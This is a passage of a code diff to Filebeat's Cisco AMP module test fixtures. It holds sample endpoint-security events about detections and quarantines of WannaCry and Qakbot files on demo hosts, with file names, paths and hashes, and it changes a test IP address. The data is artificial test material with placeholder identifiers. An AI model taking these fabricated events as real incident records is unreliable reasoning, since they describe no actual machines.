e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
index 6fb9fdebb741..58adf113ba63 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -58,7 +58,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -74,7 +74,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -108,7 +108,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 1522,
+        "log.offset": 1527,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -117,7 +117,7 @@
